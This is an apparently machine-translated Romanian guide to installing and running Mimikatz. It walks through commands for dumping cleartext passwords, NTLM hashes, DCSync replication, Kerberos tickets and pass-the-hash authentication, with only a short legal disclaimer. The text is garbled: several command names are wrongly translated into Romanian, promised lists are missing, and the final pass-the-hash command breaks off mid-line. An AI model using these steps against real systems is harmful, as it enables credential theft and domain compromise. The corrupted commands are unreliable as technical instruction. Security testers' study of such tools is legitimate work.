Mimikatz este un instrument puternic de post-exploatare conceput pentru a extrage parole în text clar, hașuri, coduri PIN și tichete Kerberos din memorie. Acesta este utilizat pe scară largă de către testeri de penetrare și profesioniști în securitate pentru a evalua vulnerabilitățile sistemului. Acest ghid oferă o abordare pas cu pas a instalării și utilizării Mimikatz pentru testarea etică a securității.
Avertisment: Utilizarea neautorizată a Mimikatz este ilegală. Asigurați-vă că aveți permisiunea înainte de a-l utiliza în orice mediu.
Înainte de a instala Mimikatz, asigurați-vă că aveți următoarele:
Mimikatz este un instrument open-source disponibil pe GitHub. Pentru a-l descărca:
Alternativ, puteți clona depozitul utilizând Git:
git clone https://github.com/gentilkiwi/mimikatz.git
Deoarece Mimikatz necesită privilegii administrative, urmați acești pași pentru a-l rula:
cd path\to\mimikatz\x64
mimikatz.exe
mimikatz #
prompt.Înainte de a extrage acreditările, verificați dacă aveți suficiente privilegii:
privilegiu::debug
În caz de succes, ar trebui să vedeți: Privilegiul '20' OK
Pentru a extrage parolele în text clar din memorie, utilizați:
sekurlsa::logonpasswords
Aceasta va afișa numele de utilizator, domeniul și parolele în text clar, dacă sunt disponibile.
Hashes-urile NTLM pot fi utilizate pentru atacuri de tip pass-the-hash. Pentru a le extrage, executați:
lsadump::sam
Sau, pentru sisteme la distanță:
lsadump::dcsync /domain:targetdomain.com /user:Administrator
Pentru a extrage biletele Kerberos din sistem:
sekurlsa::bilete /export
Acest lucru exportă fișiere .kirbi
, care pot fi utilizate în atacuri de tip pass-the-ticket.
Pentru a vă autentifica cu un hash NTLM în locul unei parole:
sekurlsa::pth /user:Administrator /domain:example.com /ntlm: